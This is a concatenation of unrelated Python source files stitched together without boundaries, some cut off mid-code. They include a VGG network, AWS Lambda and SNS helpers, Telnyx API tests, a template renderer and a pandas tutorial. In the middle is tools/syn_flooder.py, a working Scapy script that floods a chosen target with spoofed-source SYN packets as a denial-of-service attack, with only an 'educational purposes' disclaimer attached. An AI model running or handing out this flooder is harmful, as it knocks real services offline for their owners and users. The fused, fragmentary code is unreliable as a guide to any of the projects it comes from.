get_trainset_labelled(self): return self.get_split('train') def get_trainset_unlabelled(self): return self.get_split('train') def get_testset(self): return self.get_split('validation') def get_num_train_labelled(self): return self.SPLITS_TO_SIZES['train'] def get_num_train_unlabelled(self): return self.SPLITS_TO_SIZES['train'] def get_num_test(self): return self.SPLITS_TO_SIZES['validation'] import torch import torch.nn as nn from typing import Union, List, Dict, Any, cast __all__ = [ 'VGG', 'vgg11_m4', 'vgg11_m4_bn', 'vgg11', 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn', 'vgg19_bn', 'vgg19', ] class VGG(nn.Module): def __init__(self, features: nn.Module, num_classes: 100, init_weights: bool = True) -> None: super(VGG, self).__init__() self.features = features self.avgpool = nn.AdaptiveAvgPool2d((6, 6)) 
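# AdaptiveAvgPool2d pins the feature map at 512 x 6 x 6 regardless of the input resolution,
# matching the 512 * 6 * 6 input size of the first Linear layer in the classifier below.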
self.classifier = nn.Sequential( nn.Linear(512 * 6 * 6, 4096), nn.ReLU(True), nn.Dropout(), nn.Linear(4096, 4096), nn.ReLU(True), nn.Dropout(), nn.Linear(4096, num_classes), ) if init_weights: self._initialize_weights() def forward(self, x: torch.Tensor) -> torch.Tensor: x = self.features(x) x = self.avgpool(x) x = torch.flatten(x, 1) x = self.classifier(x) return x def _initialize_weights(self) -> None: for m in self.modules(): if isinstance(m, nn.Conv2d): nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu') if m.bias is not None: nn.init.constant_(m.bias, 0) elif isinstance(m, nn.BatchNorm2d): nn.init.constant_(m.weight, 1) nn.init.constant_(m.bias, 0) elif isinstance(m, nn.Linear): nn.init.normal_(m.weight, 0, 0.01) nn.init.constant_(m.bias, 0) def make_layers(cfg: List[Union[str, int]], batch_norm: bool = False) -> nn.Sequential: layers: List[nn.Module] = [] in_channels = 3 for v in cfg: if v == 'M': layers += [nn.MaxPool2d(kernel_size=2, stride=2)] else: v = cast(int, v) conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1) if batch_norm: layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)] else: layers += [conv2d, nn.ReLU(inplace=True)] in_channels = v return nn.Sequential(*layers) cfgs: Dict[str, List[Union[str, int]]] = { 'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'], 'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'], 'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'], 'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'], 'F': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M'] } def _vgg(arch: str, cfg: str, batch_norm: bool, num_classes: int, **kwargs: Any) -> VGG: model = VGG(make_layers(cfgs[cfg], batch_norm=batch_norm), num_classes, **kwargs) return model def vgg11_m4(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg11_m4', 'F', False, num_classes=num_classes, **kwargs) def vgg11_m4_bn(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg11_m4_bn', 'F', True, num_classes=num_classes, **kwargs) def vgg11(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg11', 'A', False, num_classes=num_classes, **kwargs) def vgg11_bn(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg11_bn', 'A', True, num_classes=num_classes, **kwargs) def vgg13(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg13', 'B', False, num_classes=num_classes, **kwargs) def vgg13_bn(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg13_bn', 'B', True, num_classes=num_classes, **kwargs) def vgg16(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg16', 'D', False, num_classes=num_classes, **kwargs) def vgg16_bn(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg16_bn', 'D', True, num_classes=num_classes, **kwargs) def vgg19(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg19', 'E', False, num_classes=num_classes, **kwargs) def vgg19_bn(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg19_bn', 'E', True, num_classes=num_classes, **kwargs) import json from boto3.dynamodb.conditions import Attr from datetime import datetime from utils import JsonPayloadBuilder, translate_text, format_update_expr, table, resp_handler @resp_handler def patch_review(key, ts, review, uid): resp_body = JsonPayloadBuilder().add_status(True).add_data(None).add_message('').compile() primary_key = { "course_key": key, "created_at": ts } if "comment" not in review: dt_now = datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z' 
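# Rating-only update: the request carried no comment text, so skip translation entirely and
# just overwrite the numeric scores and the updated_at timestamp; the uid condition below
# ensures a caller can only modify their own review.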
table.update_item( Key=primary_key, ConditionExpression=Attr('uid').eq(uid), UpdateExpression="SET updated_at = :ts, benefit = :ben, difficulty = :diff, satisfaction = :sat", ExpressionAttributeValues={ ":ts": dt_now, ":ben": review["benefit"], ":diff": review["difficulty"], ":sat": review["satisfaction"] } ) return resp_body text = review["comment"] src_lang, translated = translate_text(text) dt_now = datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z' expr, expr_attr_name, expr_attr_val = format_update_expr(src_lang, translated, review, dt_now) table.update_item( Key=primary_key, ConditionExpression=Attr('uid').eq(uid), UpdateExpression=expr, ExpressionAttributeNames=expr_attr_name, ExpressionAttributeValues=expr_attr_val ) return resp_body def handler(event, context): req = json.loads(event['body']) params = { "key": event["pathParameters"]["key"], "ts": event["queryStringParameters"]["ts"], "review": req["data"], "uid": event['requestContext']['authorizer']['claims']['sub'] } return patch_review(**params) """ Contains a unified method for extracting literals from an AST in a common fashion. Extracted from Add_Neutral and Lambda_Identity. """ from typing import Optional import libcst def get_all_literals(cst_to_collect: "Node") -> [(str, "Node")]: """ Uses a LibCST Visitor to gather all "simple_string", "float" and "integer" literals in the given LibCST Node. If the LibCST Node is e.g. a module, it returns all modules. Can contain duplicates. For convenience, the return value is a tuple of ("type","value"). :param cst_to_collect: The LibCST Node to gather literals in. Recursively traverses down-stream. :returns: The seen literals, as a list of (type,value). Value is a libcst literal node. Extracted as used in multiple places, and for easier testability. """ visitor = __LiteralCollector() cst_to_collect.visit(visitor) results = [("simple_string", x) for x in visitor.seen_strings] \ + [("float", x) for x in visitor.seen_floats] \ + [("integer", x) for x in visitor.seen_integers] del visitor return results class __LiteralCollector(libcst.CSTVisitor): def __init__(self): self.seen_floats = [] self.seen_strings = [] self.seen_integers = [] def visit_Float(self, node: "Float") -> Optional[bool]: """ LibCST built-in traversal that puts all seen float-literals in the known literals. """ self.seen_floats.append(node) def visit_Integer(self, node: "Integer") -> Optional[bool]: """ LibCST built-in traversal that puts all seen float-literals in the known literals. """ self.seen_integers.append(node) def visit_SimpleString(self, node: "SimpleString") -> Optional[bool]: """ LibCST built-in traversal that puts all seen SimpleString-literals in the known literals. """ self.seen_strings.append(node) tools/syn_flooder.py1-10 #!/usr/bin/env python """Simple SYN Flooder and spoofer This software is intended for educational purposes and can only be used against systems with permission from owner. The user is the only one responsible for any damages. By using this software you agree with the terms. Usage: syn_flooder.py [--sleep=] [-v] [-vv] Options: -h, --help Show this screen. --version Show version. --sleep= How many seconds to sleep betseen scans [default: 0]. -v, --verbose Show addresses being spoofed. -vv, --very-verbose Display everything. """ from docopt import docopt import logging import sys logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * def main(arguments): src_net = "192.168.250." 
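# src_net is the /24 prefix used to fabricate spoofed source addresses: the nested loops
# below walk hosts .1-.253 on this prefix and source ports 1024-65534, sending one forged
# SYN packet per (host, port) pair at the target, optionally sleeping between packets.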
dst_ip = arguments[""] dst_port = int(arguments[""]) if arguments["--verbose"] == 1: verbose = True double_verbose = False elif arguments["--verbose"] == 2: double_verbose = True verbose = True else: double_verbose = False verbose = False if int(arguments["--sleep"]) != 0: sleep = True seconds = int(arguments["--sleep"]) else: sleep = False seconds = 0 print("\n###########################################") print("# Starting Denial of Service attack...") print("###########################################\n") for src_host in range(1,254): if verbose or double_verbose: print("[*] Sending spoofed SYN packets from %s%s" % (src_net, src_host)) print("--------------------------------------------") for src_port in range(1024, 65535): if double_verbose: print("[+] Sending a spoofed SYN packet from %s%s:%s" % (src_net, src_host, src_port)) # Build the packet src_ip = src_net + str(src_host) network_layer = IP(src=src_ip,dst=dst_ip) transport_layer = TCP(sport=src_port, dport=dst_port,flags="S") # Send the packet send(network_layer/transport_layer,verbose=False) if sleep: time.sleep(seconds) print("[+] Denial of Service attack finished.") if __name__ == '__main__': arguments = docopt(__doc__, version="SYN Flooder 1.0") main(arguments) src/cinefolders/export.py from pathlib import Path import string class ExportBash: def __init__(self,location): abslocation = location.absolute() # self.checkDestExists(location) #sort of assumes location is a filename #todo just figure this out for them if(len(location.suffix)==0): raise RuntimeError("Please specify an export file, not directory. Note: you must also specify an "+ "extension like '.sh'") self.checkmkdir(abslocation.parent) self.exportLocation = abslocation self.lines = ['#!/bin/bash'] self.createddirs = {} self.exportLocation.touch() #make sure we have permissions def checkDestExists(self,pathobj): try: pathobj.mkdir(parents=True) except FileExistsError as fee: if(fee.errno == 17): #ignore if dest already exists pass else: raise fee def checkmkdir(self,pathobj): if(not pathobj.exists() and str(pathobj.absolute()) not in self.createddirs): for p in pathobj.absolute().parents: self.createddirs.update({str(p):True}) self.lines.append('mkdir -p "'+self.escape_chars(str(pathobj.absolute()))+'"') def addCopy(self,src,dst): self.checkmkdir(dst.parent) self.lines.append('cp "' + self.escape_chars(str(src)) + '" "' + self.escape_chars(str(dst))+'"') def addMove(self,src,dst): self.checkmkdir(dst.parent) self.lines.append('mv "' + self.escape_chars(str(src)) + '" "' + self.escape_chars(str(dst))+'"') def escape_chars(self,text): escaped = str(text) trantab = str.maketrans({ # {"'":"\'", '"': '\"', # "#":"\#", # ":": "\:", # "!": "\!", # " ": "\ ", # ";":"\;", }) return escaped.translate(trantab) def writeout(self): if(len(self.lines)>1): fulltext = self.lines[0] + '\n\n' fulltext += '\n'.join(self.lines[1:]) fulltext += "\n\n#created by cinefolders: github.com/hgibs/cinefolders" self.exportLocation.write_text(self.escape_chars(fulltext)+'\n') else: print("Nothing to export!")rjkboyle/telnyx-python from __future__ import absolute_import, division, print_function import pytest import telnyx TEST_RESOURCE_ID = "123" class TestMessagingProfile(object): def test_is_listable(self, request_mock): resources = telnyx.MessagingProfile.list() request_mock.assert_requested("get", "/v2/messaging_profiles") assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.MessagingProfile) def test_is_retrievable(self, request_mock): resource = 
telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) request_mock.assert_requested( "get", "/v2/messaging_profiles/%s" % TEST_RESOURCE_ID ) assert isinstance(resource, telnyx.MessagingProfile) def test_is_creatable(self, request_mock): resource = telnyx.MessagingProfile.create(name="my-profile") request_mock.assert_requested("post", "/v2/messaging_profiles") assert isinstance(resource, telnyx.MessagingProfile) def test_is_saveable(self, request_mock): messaging_profile = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) messaging_profile.name = "value" resource = messaging_profile.save() request_mock.assert_requested( "patch", "/v2/messaging_profiles/%s" % TEST_RESOURCE_ID ) assert isinstance(resource, telnyx.MessagingProfile) assert resource is messaging_profile def test_is_modifiable(self, request_mock): resource = telnyx.MessagingProfile.modify(TEST_RESOURCE_ID, name="Test") request_mock.assert_requested( "patch", "/v2/messaging_profiles/%s" % TEST_RESOURCE_ID ) assert isinstance(resource, telnyx.MessagingProfile) def test_is_deletable(self, request_mock): resource = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) resource.delete() request_mock.assert_requested( "delete", "/v2/messaging_profiles/%s" % TEST_RESOURCE_ID ) @pytest.mark.skip(reason="Might be deprecated") def test_can_call_messaging_phone_numbers(self, request_mock): resources = telnyx.MessagingProfile.list_phone_numbers(TEST_RESOURCE_ID) request_mock.assert_requested( "get", "/v2/messaging_profiles/%s/phone_numbers" % TEST_RESOURCE_ID ) assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.MessagingPhoneNumber) @pytest.mark.skip(reason="Might be deprecated") def test_can_call_phone_numbers(self, request_mock): messaging_profile = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) resources = messaging_profile.phone_numbers() request_mock.assert_requested( "get", "/v2/messaging_profiles/%s/phone_numbers" % TEST_RESOURCE_ID ) assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.MessagingPhoneNumber) @pytest.mark.skip(reason="Might be deprecated") def test_can_call_phone_numbers_forward_params(self, request_mock): messaging_profile = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) resources = messaging_profile.phone_numbers(page={"size": 10}) request_mock.assert_requested( "get", "/v2/messaging_profiles/%s/phone_numbers" % TEST_RESOURCE_ID, {"page": {"size": 10}}, ) assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.MessagingPhoneNumber) def test_can_call_messaging_short_codes(self, request_mock): resources = telnyx.MessagingProfile.list_short_codes(TEST_RESOURCE_ID) request_mock.assert_requested( "get", "/v2/messaging_profiles/%s/short_codes" % TEST_RESOURCE_ID ) assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.ShortCode) def test_can_call_short_codes(self, request_mock): messaging_profile = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) resources = messaging_profile.short_codes() request_mock.assert_requested( "get", "/v2/messaging_profiles/%s/short_codes" % TEST_RESOURCE_ID ) assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.ShortCode) def test_can_call_short_codes_forward_params(self, request_mock): messaging_profile = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) resources = messaging_profile.short_codes(page={"size": 20}) request_mock.assert_requested( "get", "/v2/messaging_profiles/%s/short_codes" % TEST_RESOURCE_ID, {"page": {"size": 20}}, ) 
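# --- Hypothetical end-to-end sketch of the resource calls exercised by the tests
# --- above (not part of the test suite). The api_key assignment is an assumed
# --- placeholder for the library's usual authentication attribute, not a credential.
import telnyx
telnyx.api_key = "KEY_PLACEHOLDER"                              # assumption: placeholder only
profile = telnyx.MessagingProfile.create(name="my-profile")     # POST /v2/messaging_profiles
profile.name = "renamed-profile"
profile.save()                                                  # PATCH /v2/messaging_profiles/{id}
profile.delete()                                                # DELETE /v2/messaging_profiles/{id}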
assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.ShortCode) run_describe_sns.py #!/usr/bin/env python3 from env import env from run_common import AWSCli aws_cli = AWSCli() def describe_sns_topic(): if not env.get('sns'): return False topic_name_list = list() sns_list = env['sns'] for sl in sns_list: if sl['TYPE'] == 'topic': topic_name_list.append(sl['NAME']) cmd = ['sns', 'list-topics'] result = aws_cli.run(cmd) for topic in result['Topics']: for tname in topic_name_list: suffix = ':%s' % tname # noinspection PyTypeChecker arn = topic['TopicArn'] if arn.endswith(suffix): return True return False results = list() if describe_sns_topic(): results.append('SNS Topic -------------- O') else: results.append('SNS Topic -------------- X') print('#' * 80) for r in results: print(r) print('#' * 80) 1-10 from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7 # Importing the Kratos Library import KratosMultiphysics as KratosMultiphysics import KratosMultiphysics.MeshingApplication as MeshingApplication def Factory(settings, Model): if not isinstance(settings, KratosMultiphysics.Parameters): raise Exception("expected input shall be a Parameters object, encapsulating a json string") return MultiscaleRefiningProcess(Model, settings["Parameters"]) class MultiscaleRefiningProcess(KratosMultiphysics.Process): def __init__(self, Model, settings ): ## Settings string in json format default_parameters = KratosMultiphysics.Parameters(""" { "main_model_part_name" : "MainModelPart", "visualization_model_part_name" : "VisualizationModelPart", "current_subscale" : 0, "maximum_number_of_subscales" : 4, "echo_level" : 0, "advanced_configuration" : { "echo_level" : 0, "number_of_divisions_at_subscale" : 2, "subscale_interface_base_name" : "refined_interface", "subscale_boundary_condition" : "Condition2D2N" } } """) # Overwrite the default settings with user-provided parameters self.settings = settings self.settings.RecursivelyValidateAndAssignDefaults(default_parameters) self.model = Model self.echo_level = self.settings['echo_level'].GetInt() self.current_subscale = self.settings['current_subscale'].GetInt() self.maximum_number_of_subscales = self.settings['maximum_number_of_subscales'].GetInt() # Get the coarse model part name self.coarse_model_part_name = self.settings['main_model_part_name'].GetString() if (self.current_subscale > 0): self.coarse_model_part_name += '_' + str(self.current_subscale) # Get the coarse model part self.coarse_model_part = self.model[self.coarse_model_part_name] # Get the visualization model part if (self.current_subscale == 0): self._InitializeVisualizationModelPart() else: self.visualization_model_part = self.model[self.settings['visualization_model_part_name'].GetString()] # Initialize the refined model part if (self.current_subscale < self.maximum_number_of_subscales): self._InitializeRefinedModelPart() def ExecuteInitialize(self): # Create the new subscale process self.subscales_utility = MeshingApplication.MultiscaleRefiningProcess( self.coarse_model_part, self.refined_model_part, self.visualization_model_part, self.settings["advanced_configuration"]) if self.echo_level > 0: print('The multiscale process is initialized') if self.echo_level > 1: print(self.model[self.coarse_model_part_name]) print(self.model[self.refined_model_part_name]) def ExecuteBeforeSolutionLoop(self): pass def ExecuteInitializeSolutionStep(self): self._ExecuteRefinement() def 
ExecuteFinalizeSolutionStep(self): self._ExecuteCoarsening() def ExecuteBeforeOutputStep(self): pass def ExecuteAfterOutputStep(self): pass def ExecuteFinalize(self): pass def Clear(self): pass def GetCoarseModelPart(self): return self.coarse_model_part def GetRefinedModelPart(self): return self.refined_model_part def GetVisualizationModelPart(self): return self.visualization_model_part def _InitializeVisualizationModelPart(self): visualization_model_part_name = self.settings['visualization_model_part_name'].GetString() self.visualization_model_part = self.model.CreateModelPart(visualization_model_part_name) buffer_size = self.coarse_model_part.GetBufferSize() self.visualization_model_part.SetBufferSize(buffer_size) MeshingApplication.MultiscaleRefiningProcess.InitializeNewModelPart(self.coarse_model_part, self.visualization_model_part) def _InitializeRefinedModelPart(self): self.refined_model_part_name = self.settings['main_model_part_name'].GetString() + '_' + str(self.current_subscale + 1) self.refined_model_part = self.model.CreateModelPart(self.refined_model_part_name) buffer_size = self.coarse_model_part.GetBufferSize() self.refined_model_part.SetBufferSize(buffer_size) MeshingApplication.MultiscaleRefiningProcess.InitializeNewModelPart(self.coarse_model_part, self.refined_model_part) def _ExecuteRefinement(self): self.subscales_utility.ExecuteRefinement() def _ExecuteCoarsening(self): self.subscales_utility.ExecuteCoarsening() import pyvista import numpy as np points = np.random.random((10, 3)) vpoints = pyvista.vtk_points(points) vpoints # doctest:+SKIP # Expected: ## (vtkmodules.vtkCommonCore.vtkPoints)0x7f0c2e26af40 nijotz/pdxburritoreview.com #!/usr/bin/env python from greshunkel.utils import parse_variable, interpolate from os import listdir, makedirs, path import re POSTS_DIR = "posts/" TEMPLATE_DIR = "templates/" BLOGPOST_FILE = "blog_post.html" BLOGPOST_TEMPLATE = TEMPLATE_DIR + BLOGPOST_FILE BUILD_DIR = "built/" DOCUMENTATION_FILE = "documentation.html" DOCUMENTATION_TEMPLATE = TEMPLATE_DIR + DOCUMENTATION_FILE def _render_file(file_yo, context, output_filename=None): if file_yo.get("children"): # We DoNt ReNdEr FiLeS wItH cHiLdReN for base_file in file_yo["children"]: _render_file(base_file, context) else: desired_fname = file_yo['filename'] if output_filename is None else output_filename output = open(BUILD_DIR + desired_fname, "w+") parent_file = None if file_yo['vars'].get("PARENT"): parent_file = open(file_yo['vars']['PARENT'], "r") in_file = open(file_yo['file'], "r") if parent_file: for line in parent_file: to_write = line if 'xXx' in line: if '@' in line: to_write = interpolate(line.replace("@", ""), {}, context) elif '=' in line: to_write = interpolate(line, file_yo, context) else: # ChIlD BloCk oR SoMeThIng, Yo beginning = line.split("xXx")[0] end = line.split("xXx")[2] block_name = line.split("xXx")[1].strip() block_data = file_yo['blocks'].get(block_name, "") to_write = beginning + block_data + end output.write(to_write if "core" not in to_write else to_write) else: for line in in_file: to_write = line if 'xXx' in line: to_write = interpolate(line, file_yo, context) output.write(to_write) if parent_file: parent_file.close() in_file.close() output.close() def _loop_context_interpolate(variable, loop_variable, current_item, i, context): if variable[1] == 'i': # i is special, it is an itervar muh_list = context.get(variable[0], None) return muh_list[i] if muh_list else "" elif variable[1].isdigit(): # They are trying to index a list return context.get(variable[0], 
None)[int(variable[1])] elif variable[0] == loop_variable: try: return current_item[variable[1]] except TypeError: import ipdb; ipdb.set_trace() # All else fails try to use the dict variable return current_item[variable[1]] def _render_loop(loop_obj, context): loop_list = loop_obj["loop_list"] loop_str = loop_obj["loop_str"] loop_variable = loop_obj["loop_variable"] #outer_loop_variable = loop_obj["outer_loop_variable"] temp_loop_str = "" regex = re.compile("xXx (?P[a-zA-Z_0-9\$]+) xXx") wombat = re.compile("xXx LOOP (?P[a-zA-S_]+) (?P[a-zA-S_\$]+) xXx(?P.*)xXx BBL xXx") shattered_loops = wombat.split(loop_str) if len(shattered_loops) != 1: print("BEEP BEEP BEEP SUBLOOP DETECTED") i = 0 for thing in context[loop_list]: # Lookit these higher order functions, godDAMN def loop_func(x): if x == 'i': return str(i) elif x == "BBL": return "" elif x == loop_variable: return str(thing) elif "$" in x and x in regex.findall(loop_str): #fUcK y = x.split("$") if y[0] == loop_variable and y[1].isdigit(): return thing[int(y[1])] return _loop_context_interpolate(y, loop_variable, thing, i, context) return x broken_man = regex.split(shattered_loops[0]) for chunk in broken_man: bro = loop_func(chunk) temp_loop_str = temp_loop_str + "".join(bro) if len(shattered_loops) != 1: # HACKIEST SHIT THAT EVER HACKED # TODO: If it ain't broke, don't fix it print("PARAMS HACK!") context[shattered_loops[2]] = thing["params"] temp_loop_str = temp_loop_str + _render_loop(loop_obj["loop_subloop"], context) if shattered_loops[4] != "": broken_man = regex.split(shattered_loops[4]) for chunk in broken_man: bro = loop_func(chunk) temp_loop_str = temp_loop_str + "".join(bro) i = i + 1 return temp_loop_str def parse_file(context, radical_file): tfile = open(TEMPLATE_DIR + radical_file, "r") file_meta = {} file_meta['file'] = TEMPLATE_DIR + radical_file file_meta['filename'] = radical_file file_meta['vars'] = {} file_meta['blocks'] = {} file_meta['loops'] = [] reading_block = False block_str = "" end_str = "" block_name = "" loop_stack = None active_loops = 0 for line in tfile: stripped = line.strip() if "xXx" in stripped and "=" in stripped.split("xXx")[1]: var = parse_variable(line) file_meta['vars'][var[0]] = var[1] elif "xXx TTYL xXx" == stripped: file_meta['blocks'][block_name] = block_str + end_str reading_block = False block_str = "" block_name = "" end_str = "" # We LoOpIn BaBy elif "xXx LOOP " in stripped: variables = stripped.split("xXx")[1].strip().replace("LOOP ", "").split(" ") active_loops = active_loops + 1 print("We've entered timeskip {}!".format(variables[1])) if loop_stack is None: loop_stack = { "loop_depth": active_loops, "loop_variable": variables[0], "loop_str": "", "loop_list": variables[1], "loop_subloop": None } else: #ThIs WoRkS FoR MoRe ThAn TwO LoOpS def recurse_bro(item): if item is None: loop_stack["loop_subloop"] = { "loop_depth": active_loops, "loop_variable": variables[0], "loop_str": "", "loop_list": variables[1], "loop_subloop": None } else: recurse_bro(item["loop_subloop"]) recurse_bro(loop_stack) elif "xXx BBL xXx" == stripped: active_loops = active_loops - 1 if active_loops == 0: temp_loop_str = _render_loop(loop_stack, context) # AsSuMe WeRe In A bLoCk block_str = block_str + temp_loop_str # wE DoNe LoOpIn NoW loop_stack = None elif "xXx" in stripped and reading_block is True: if '@' in stripped: line = stripped = interpolate(stripped.replace("@", ""), {}, context) elif "xXx" in stripped and reading_block is False: reading_block = True lstripped = line.split("xXx") block_name = 
lstripped[1].strip() block_str = lstripped[0] end_str = lstripped[2] if active_loops == 0 and reading_block is True and "xXx" not in stripped: block_str = block_str + line if active_loops > 0: def recurse_bro_2(item): if item is not None: if item["loop_depth"] <= active_loops: if "xXx LOOP" in stripped and item["loop_depth"] != active_loops: item["loop_str"] = item["loop_str"] + stripped elif "xXx LOOP" not in stripped: item["loop_str"] = item["loop_str"] + stripped recurse_bro_2(item["loop_subloop"]) recurse_bro_2(loop_stack) return file_meta def main(context): from greshunkel.context import DEFAULT_LANGUAGE context['DEFAULT_LANGUAGE'] = DEFAULT_LANGUAGE all_templates = [] required_dirs = ['./built', './built/blog'] for dirn in required_dirs: if not path.exists(dirn): makedirs(dirn) for radical_file in listdir(TEMPLATE_DIR): # We don't want to render the blog_post template by itself, or the documentation. if TEMPLATE_DIR + radical_file in [BLOGPOST_TEMPLATE, DOCUMENTATION_TEMPLATE]: continue if not radical_file.endswith(".html"): continue file_meta = parse_file(context, radical_file) all_templates.append(file_meta) # BuIlD a SiCk TrEe oF TeMpLaTeS yO tree = {} for tfile in all_templates: if tfile['vars'].get('PARENT'): parent = tfile['vars']['PARENT'] if tree.get(parent): tree[parent]['children'].append(tfile) else: tree[parent] = { 'children': [tfile] } for base_file in tree: _render_file(tree[base_file], context) # BeCaUsE WhY NoT return 0 0 """Rich Module""" __docformat__ = "numpy" import os from typing import Tuple from rich import panel from rich.console import Console, Theme from rich.text import Text from rich.color import Color from openbb_terminal import config_terminal as cfg from openbb_terminal import feature_flags as obbff # https://rich.readthedocs.io/en/stable/appendix/colors.html#appendix-colors # https://rich.readthedocs.io/en/latest/highlighting.html#custom-highlighters CUSTOM_THEME = Theme(cfg.theme.console_style) RICH_TAGS = [ "[menu]", "[/menu]", "[cmds]", "[/cmds]", "[info]", "[/info]", "[param]", "[/param]", "[src]", "[/src]", "[help]", "[/help]", ] USE_COLOR = True def no_panel(renderable, *args, **kwargs): # pylint: disable=unused-argument return renderable class ConsoleAndPanel: """Create a rich console to wrap the console print with a Panel""" def __init__(self): self.console = Console(theme=CUSTOM_THEME, highlight=False, soft_wrap=True) def capture(self): return self.console.capture() @staticmethod def filter_rich_tags(text): for val in RICH_TAGS: text = text.replace(val, "") return text @staticmethod def blend_text( message: str, color1: Tuple[int, int, int], color2: Tuple[int, int, int] ) -> Text: """Blend text from one color to another.""" text = Text(message) r1, g1, b1 = color1 r2, g2, b2 = color2 dr = r2 - r1 dg = g2 - g1 db = b2 - b1 size = len(text) + 5 for index in range(size): blend = index / size color = f"#{int(r1 + dr * blend):02X}{int(g1 + dg * blend):02X}{int(b1 + db * blend):02X}" text.stylize(color, index, index + 1) return text def print(self, *args, **kwargs): if kwargs and "text" in list(kwargs) and "menu" in list(kwargs): if not os.getenv("TEST_MODE"): if obbff.ENABLE_RICH_PANEL: version = self.blend_text( f"OpenBB Terminal v{obbff.VERSION}", Color.parse("#00AAFF").triplet, Color.parse("#E4003A").triplet, ) link = " (https://openbb.co)" link_text = Text(link) link_text.stylize("#FCED00", 0, len(link)) version += link_text self.console.print( panel.Panel( kwargs["text"], title=kwargs["menu"], subtitle_align="right", subtitle=version, ) ) 
else: self.console.print(kwargs["text"]) else: print(self.filter_rich_tags(kwargs["text"])) else: if not os.getenv("TEST_MODE"): self.console.print(*args, **kwargs) else: print(*args, **kwargs) console = ConsoleAndPanel() from .u2net_transformer_pseudo_dino_final import U2NET from .u2net import U2NETP #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Jul 17 16:17:25 2017 @author: jorgemauricio """ # librerias import numpy as np from pandas import Series,DataFrame import pandas as pd # generar dos series, primer serie ser1 = Series([0,1,2],index=['A','B','C']) # desplegar ser1 # segunda serie ser2 = Series([3,4,5,6],index=['A','B','C','D']) # desplegar ser2 # que pasa cuando se agregan dos series ser1 + ser2 # verificar que los valores NAN se añaden automaticamente # ahora con DataFrames dframe1 = DataFrame(np.arange(4).reshape(2,2),columns=list('AB'),index=['NYC','LA']) # desplegar dframe1 # segundo DataFrame dframe2 = DataFrame(np.arange(9).reshape(3,3),columns=list('ADC'),index=['NYC','SF','LA']) # desplegar dframe2 # que pasa cuando los agregamos dframe1 + dframe2 # que pasa si queremos remplazar los valores Nan # usamos la funcion .add() dframe1.add(dframe2,fill_value=0) # ahora podemos ver que los valores estan completos, pero aun existen valores SF y B sin valores# -*- coding: utf-8 -*- # # Copyright 2017 # # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # This is the main module from io import StringIO import collections import inspect import locale import logging import os import traceback __all__ = [ 'i18n', 'I18NMessage', 'TranslationService' ] log = logging.getLogger(__name__) def getLogger(o): '''Get a logger for an instance''' clz = o.__class__ return logging.getLogger('%s.%s' % (clz.__module__, clz.__name__)) class I18NMessage(object): '''Encode the information which message to display and the arguments for the message. Methods decorated with @i18n will return instanes of this type.''' def __init__(self, key, locale=None, *args, **kwargs): self.key, self.locale, self.args, self.kwargs = key, locale, args, kwargs def __repr__(self): if self.locale is None: return 'I18NMessage(%s, %r, %r)' % (self.key, self.args, self.kwargs) return 'I18NMessage(%s, locale=%r, %r, %r)' % (self.key, self.locale, self.args, self.kwargs) def __eq__(self): '''Two messages are the same when the key is the same and the arguments are the same. 
